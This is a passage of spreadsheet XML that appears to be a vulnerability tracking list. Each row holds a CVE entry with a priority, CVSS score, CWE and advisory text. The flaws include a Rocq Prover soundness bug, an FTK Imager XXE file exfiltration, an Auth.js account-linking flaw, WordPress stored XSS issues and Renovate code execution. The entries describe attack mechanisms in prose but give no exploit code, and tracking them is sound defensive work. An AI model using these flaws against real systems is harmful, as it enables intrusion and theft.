          <t>The guard checker in Rocq Prover does not follow recursive calls made through a fixpoint's own arguments. A fixpoint may pass itself as a higher-order argument to a second fixpoint, which then applies it to a value that is not a subterm of the structural argument. Passing the recursive function to a plain definition is rejected because the checker unfolds the definition and observes the call, but passing it to a fixpoint is accepted because higher-order recursive calls through fixpoint arguments are not tracked. This admits a type that is definitionally equal to its own negation, so self-application produces False in purely definitional code, without tactics, axioms, plugins or unsafe flags, and Print Assumptions reports the result as closed under the global context. Fixed in Rocq 9.2.0.</t>
        </is>
      </c>
      <c r="M3737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72705</t>
        </is>
      </c>
    </row>
    <row r="3738">
      <c r="A3738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72714</t>
        </is>
      </c>
      <c r="C3738" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3738" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3738" s="5" t="inlineStr"/>
      <c r="F3738" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3738" s="5" t="inlineStr"/>
      <c r="H3738" s="5" t="inlineStr"/>
      <c r="I3738" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3738" s="5" t="inlineStr"/>
      <c r="K3738" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="L3738" s="5" t="inlineStr">
        <is>
          <t>Rocq Prover does not restore the universe graph's copy of the universe checking flag when a module that locally disabled the check is closed. Local Unset Universe Checking inside a module is expected to last only until the module ends, and the global flag is restored, but the universe graph keeps its own copy which is left disabled. The two views then disagree: Test Universe Checking reports the check as enabled while the kernel continues to accept universe-inconsistent terms. With the constraint between two universes no longer enforced, Hurkens' paradox applies and yields a proof of False, from which any proposition follows. The proof uses no axioms, plugins or unsafe features once the module has closed, and Print Assumptions reports it as closed under the global context, so neither the assumption audit nor the flag query reflects the actual kernel state. No fix is available.</t>
        </is>
      </c>
      <c r="M3738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72714</t>
        </is>
      </c>
    </row>
    <row r="3739">
      <c r="A3739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72985</t>
        </is>
      </c>
      <c r="C3739" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3739" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3739" s="5" t="inlineStr"/>
      <c r="F3739" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3739" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3739" s="5" t="inlineStr"/>
      <c r="I3739" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3739" s="5" t="inlineStr"/>
      <c r="K3739" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3739" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Shadow Copy allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M3739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72985</t>
        </is>
      </c>
    </row>
    <row r="3740">
      <c r="A3740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72999</t>
        </is>
      </c>
      <c r="C3740" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3740" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3740" s="5" t="inlineStr"/>
      <c r="F3740" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3740" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3740" s="5" t="inlineStr"/>
      <c r="I3740" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3740" s="5" t="inlineStr"/>
      <c r="K3740" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3740" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Hub Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M3740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72999</t>
        </is>
      </c>
    </row>
    <row r="3741">
      <c r="A3741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73066</t>
        </is>
      </c>
      <c r="C3741" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3741" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3741" s="5" t="inlineStr"/>
      <c r="F3741" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3741" s="5" t="inlineStr"/>
      <c r="H3741" s="5" t="inlineStr"/>
      <c r="I3741" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3741" s="5" t="inlineStr"/>
      <c r="K3741" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3741" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. Prior to 5.5.3, a crafted .traineddata LSTM model component loaded through Tesseract's deserializer can cause an unchecked signed integer multiplication in Convolve::DeSerialize in src/lstm/convolve.cpp to wrap the convolution output-channel count, undersizing the forward-pass output buffer while writes use the unwrapped element count and causing a heap out-of-bounds write during OCR recognition. This issue is fixed in version 5.5.3.</t>
        </is>
      </c>
      <c r="M3741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73066</t>
        </is>
      </c>
    </row>
    <row r="3742">
      <c r="A3742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73419</t>
        </is>
      </c>
      <c r="C3742" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3742" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3742" s="5" t="inlineStr"/>
      <c r="F3742" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3742" s="5" t="inlineStr"/>
      <c r="H3742" s="5" t="inlineStr"/>
      <c r="I3742" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3742" s="5" t="inlineStr"/>
      <c r="K3742" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346, CWE-940</t>
        </is>
      </c>
      <c r="L3742" s="5" t="inlineStr">
        <is>
          <t>NextAuth.js provides authentication for Next.js. Prior to@auth/core 0.41.3 and next-auth 4.24.15 and 5.0.0-beta.32, Auth.js stores the OAuth/OIDC anti-CSRF checks state, nonce, and the PKCE verifier in global cookies that are not bound to the provider that created them. On callback, a check value minted during a sign-in started with one provider can satisfy the callback for a different provider because the stored cookie is not verified against the callback provider's identity, including the provider ID, issuer, client ID, or redirect URI. In a multi-provider application that permits account linking while logged in, when one provider's authorization request is observable and a target provider callback can be satisfied without a PKCE verifier, an attacker can lure a victim into starting a legitimate same-origin flow and link the attacker's target-provider account to the victim's Auth.js user. The linked provider grants the attacker persistent sign-in to the victim's account, while cross-site request forgery alone is insufficient. This issue is fixed in @auth/core 0.41.3 and next-auth 4.24.15 and 5.0.0-beta.32.</t>
        </is>
      </c>
      <c r="M3742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73419</t>
        </is>
      </c>
    </row>
    <row r="3743">
      <c r="A3743" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74853</t>
        </is>
      </c>
      <c r="C3743" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3743" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3743" s="5" t="inlineStr"/>
      <c r="F3743" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3743" s="5" t="inlineStr"/>
      <c r="H3743" s="5" t="inlineStr"/>
      <c r="I3743" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3743" s="5" t="inlineStr"/>
      <c r="K3743" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L3743" s="5" t="inlineStr">
        <is>
          <t>The Pods  WordPress plugin before 3.3.9.2 does not restrict which functions a display callback may resolve to, allowing users with the author role and above to read arbitrary files from the server, including files outside the web root. Only sites using the restricted display-callback mode are affected, which is the automatic default on installations whose first Pods version predates 3.1.</t>
        </is>
      </c>
      <c r="M3743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74853</t>
        </is>
      </c>
    </row>
    <row r="3744">
      <c r="A3744" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74859</t>
        </is>
      </c>
      <c r="C3744" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3744" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3744" s="5" t="inlineStr"/>
      <c r="F3744" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3744" s="5" t="inlineStr"/>
      <c r="H3744" s="5" t="inlineStr"/>
      <c r="I3744" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3744" s="5" t="inlineStr"/>
      <c r="K3744" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3744" s="5" t="inlineStr">
        <is>
          <t>The shell theme installer in gnome-tweaks extracts user-supplied ZIP archives without validating archive member paths. As a result, a crafted theme archive can write files outside ~/.themes by using ../ path traversal, absolute paths, or symlink entries.</t>
        </is>
      </c>
      <c r="M3744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74859</t>
        </is>
      </c>
    </row>
    <row r="3745">
      <c r="A3745" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76226</t>
        </is>
      </c>
      <c r="C3745" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3745" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3745" s="5" t="inlineStr"/>
      <c r="F3745" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3745" s="5" t="inlineStr"/>
      <c r="H3745" s="5" t="inlineStr"/>
      <c r="I3745" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3745" s="5" t="inlineStr"/>
      <c r="K3745" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3745" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 43.65.0 before 43.102.11 contain a remote code execution vulnerability in bazel-module and bazelisk managers when using lockFileMaintenance. Attackers can execute arbitrary code by providing malicious dependencies that are referenced in bazel mod deps calls, such as within ctx.execute statements.</t>
        </is>
      </c>
      <c r="M3745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76226</t>
        </is>
      </c>
    </row>
    <row r="3746">
      <c r="A3746" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76227</t>
        </is>
      </c>
      <c r="C3746" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3746" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3746" s="5" t="inlineStr"/>
      <c r="F3746" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3746" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H3746" s="5" t="inlineStr"/>
      <c r="I3746" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3746" s="5" t="inlineStr"/>
      <c r="K3746" s="5" t="inlineStr">
        <is>
          <t>CWE-526</t>
        </is>
      </c>
      <c r="L3746" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 42.68.1 before 42.96.3 (and from 42.68.1 before 43.4.4), including corresponding Docker images (renovate/renovate, mend/renovate-ce, renovate-ee-server, renovate-ee-worker &gt;=13.3.0 &lt;13.6.0), fail to restrict environment variables to an allowlist when spawning child processes. As a result, child processes (e.g. npm install, postUpgradeTasks, postUpdateOptions) gain full access to all environment variables of the Renovate process, allowing insider or outside attackers to exfiltrate secrets accessible to the Renovate deployment.</t>
        </is>
      </c>
      <c r="M3746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76227</t>
        </is>
      </c>
    </row>
    <row r="3747">
      <c r="A3747" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77892</t>
        </is>
      </c>
      <c r="C3747" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3747" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3747" s="5" t="inlineStr"/>
      <c r="F3747" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3747" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3747" s="5" t="inlineStr"/>
      <c r="I3747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3747" s="5" t="inlineStr"/>
      <c r="K3747" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L3747" s="5" t="inlineStr">
        <is>
          <t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M3747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t>
        </is>
      </c>
    </row>
    <row r="3748">
      <c r="A3748" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78451</t>
        </is>
      </c>
      <c r="C3748" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3748" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3748" s="5" t="inlineStr"/>
      <c r="F3748" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3748" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3748" s="5" t="inlineStr"/>
      <c r="I3748" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3748" s="5" t="inlineStr"/>
      <c r="K3748" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L3748" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M3748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t>
        </is>
      </c>
    </row>
    <row r="3749">
      <c r="A3749" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78579</t>
        </is>
      </c>
      <c r="C3749" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3749" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3749" s="5" t="inlineStr"/>
      <c r="F3749" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3749" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H3749" s="5" t="inlineStr"/>
      <c r="I3749" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3749" s="5" t="inlineStr"/>
      <c r="K3749" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="L3749" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize SAML assertion attribute values before interpolating them into LDAP search filters in the LDAP datastore configuration. The raw values are substituted directly into the filter string and passed to the LDAP search operation, resulting in modification of the intended query logic.</t>
        </is>
      </c>
      <c r="M3749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78579</t>
        </is>
      </c>
    </row>
    <row r="3750">
      <c r="A3750" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81052</t>
        </is>
      </c>
      <c r="C3750" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3750" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3750" s="5" t="inlineStr"/>
      <c r="F3750" s="5" t="inlineStr"/>
      <c r="G3750" s="5" t="inlineStr"/>
      <c r="H3750" s="5" t="inlineStr"/>
      <c r="I3750" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3750" s="5" t="inlineStr"/>
      <c r="K3750" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L3750" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain a Download of Code Without Integrity Check vulnerability. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to arbitrary code execution.</t>
        </is>
      </c>
      <c r="M3750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81052</t>
        </is>
      </c>
    </row>
    <row r="3751">
      <c r="A3751" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82325</t>
        </is>
      </c>
      <c r="C3751" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3751" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3751" s="5" t="inlineStr"/>
      <c r="F3751" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3751" s="5" t="inlineStr"/>
      <c r="H3751" s="5" t="inlineStr"/>
      <c r="I3751" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3751" s="5" t="inlineStr"/>
      <c r="K3751" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="L3751" s="5" t="inlineStr">
        <is>
          <t>A use-after-free vulnerability in the OpenVPN ovpn-dco-win driver version 2.5.0 through 2.8.6 allows local authenticated users to cause a system crash via crafted control messages</t>
        </is>
      </c>
      <c r="M3751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82325</t>
        </is>
      </c>
    </row>
    <row r="3752">
      <c r="A3752" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82525</t>
        </is>
      </c>
      <c r="C3752" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3752" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3752" s="5" t="inlineStr"/>
      <c r="F3752" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3752" s="5" t="inlineStr"/>
      <c r="H3752" s="5" t="inlineStr"/>
      <c r="I3752" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3752" s="5" t="inlineStr"/>
      <c r="K3752" s="5" t="inlineStr">
        <is>
          <t>CWE-611, CWE-829</t>
        </is>
      </c>
      <c r="L3752" s="5" t="inlineStr">
        <is>
          <t>Exterro FTK Imager before 8.3 contains an XML external entity (XXE) injection vulnerability that allows attackers to read arbitrary files from the host filesystem by embedding malicious external entity references and attacker-controlled XSLT stylesheets within a Report.xml file inside a UFDR ZIP evidence item. Attackers can craft a malicious UFDR archive that, when previewed by an examiner, causes the XML parser to resolve file:// external entity references and execute msxsl:script within the external stylesheet to exfiltrate the resolved file contents to an attacker-controlled endpoint via a generated image URL.</t>
        </is>
      </c>
      <c r="M3752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82525</t>
        </is>
      </c>
    </row>
    <row r="3753">
      <c r="A3753" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82640</t>
        </is>
      </c>
      <c r="C3753" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3753" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3753" s="5" t="inlineStr"/>
      <c r="F3753" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3753" s="5" t="inlineStr"/>
      <c r="H3753" s="5" t="inlineStr"/>
      <c r="I3753" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J3753" s="5" t="inlineStr"/>
      <c r="K3753" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="L3753" s="5" t="inlineStr">
        <is>
          <t>browser-use web-ui versions 2.0.0 through 3.0.0 write configured LLM API keys to disk in cleartext without encryption or access restrictions. Attackers with read access to the temporary settings directory can recover provider API keys from predictably-named JSON files.</t>
        </is>
      </c>
      <c r="M3753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82640</t>
        </is>
      </c>
    </row>
    <row r="3754">
      <c r="A3754" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82846</t>
        </is>
      </c>
      <c r="C3754" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3754" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3754" s="5" t="inlineStr"/>
      <c r="F3754" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3754" s="5" t="inlineStr"/>
      <c r="H3754" s="5" t="inlineStr"/>
      <c r="I3754" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3754" s="5" t="inlineStr"/>
      <c r="K3754" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3754" s="5" t="inlineStr">
        <is>
          <t>The Masteriyo LMS  WordPress plugin before 3.4.0 does not sanitise and escape some course settings before outputting them in a page available to all visitors, allowing users with a course-author role to perform Stored Cross-Site Scripting attacks that run in the session of anyone viewing the course, including a logged-in administrator.</t>
        </is>
      </c>
      <c r="M3754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82846</t>
        </is>
      </c>
    </row>
    <row r="3755">
      <c r="A3755" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83541</t>
        </is>
      </c>
      <c r="C3755" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3755" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3755" s="5" t="inlineStr"/>
      <c r="F3755" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3755" s="5" t="inlineStr"/>
      <c r="H3755" s="5" t="inlineStr"/>
      <c r="I3755" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3755" s="5" t="inlineStr"/>
      <c r="K3755" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3755" s="5" t="inlineStr">
        <is>
          <t>The Sina Extension for Elementor WordPress plugin before 3.10.4 does not properly escape a Table widget setting before outputting it within an HTML attribute, which could allow users with the Contributor role and above to perform Stored Cross-Site Scripting attacks.</t>
        </is>
      </c>
      <c r="M3755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83541</t>
        </is>
      </c>
    </row>
    <row r="3756">
      <c r="A3756" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83544</t>
        </is>
      </c>
      <c r="C3756" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3756" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3756" s="5" t="inlineStr"/>
      <c r="F3756" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3756" s="5" t="inlineStr"/>
      <c r="H3756" s="5" t="inlineStr"/>
      <c r="I3756" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3756" s="5" t="inlineStr"/>
      <c r="K3756" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3756" s="5" t="inlineStr">
        <is>
          <t>The Greenshift  WordPress plugin before 13.2.0 does not properly escape a block animation attribute before outputting it within an HTML attribute, allowing users with contributor-level access and above to inject arbitrary web scripts that execute when the content is viewed.</t>
        </is>
      </c>
      <c r="M3756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83544</t>
        </is>
      </c>
    </row>
    <row r="3757">
      <c r="A3757" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83545</t>
        </is>
      </c>
      <c r="C3757" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3757" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3757" s="5" t="inlineStr"/>
      <c r="F3757" s="5" t="inlineStr"/>
      <c r="G3757" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3757" s="5" t="inlineStr"/>
      <c r="I3757" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3757" s="5" t="inlineStr"/>
      <c r="K3757" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3757" s="5" t="inlineStr">
        <is>
          <t>The CoolClock WordPress plugin before 4.3.8 does not properly escape a custom skin setting before outputting it inside an inline script, allowing users with contributor-level access and above to inject arbitrary JavaScript that executes when the content is viewed.</t>
        </is>
      </c>
      <c r="M3757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83545</t>
        </is>
      </c>
    </row>
    <row r="3758">
      <c r="A3758" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83546</t>
        </is>
      </c>
      <c r="C3758" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3758" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3758" s="5" t="inlineStr"/>
      <c r="F3758" s="5" t="inlineStr"/>
      <c r="G3758" s="5" t="inlineStr"/>
      <c r="H3758" s="5" t="inlineStr"/>
      <c r="I3758" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3758" s="5" t="inlineStr"/>
      <c r="K3758" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3758" s="5" t="inlineStr">
        <is>
          <t>The CoolClock WordPress plugin before 4.3.8 does not properly escape a skin setting before outputting it within an HTML attribute, allowing users with contributor-level access and above to inject arbitrary web scripts that execute when the content is viewed.</t>
        </is>
      </c>
      <c r="M3758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83546</t>
        </is>
      </c>
    </row>
    <row r="3759">
      <c r="A3759" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84021</t>
        </is>
      </c>
      <c r="C3759" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3759" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3759" s="5" t="inlineStr"/>
